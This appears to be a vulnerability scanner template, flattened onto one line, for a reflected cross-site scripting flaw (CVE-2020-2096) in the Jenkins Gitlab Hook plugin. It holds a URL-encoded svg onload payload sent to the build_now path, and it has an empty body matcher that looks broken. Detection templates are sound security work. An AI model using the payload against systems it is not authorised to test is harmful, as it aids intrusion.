id: CVE-2020-2096 info: name: Jenkins Gitlab Hook XSS author: madrobot severity: medium requests: - method: GET path: - "{{BaseURL}}/gitlab/build_now%3Csvg/onload=alert(1337)%3E" matchers: - type: status status: - 200 - type: word words: - "" part: body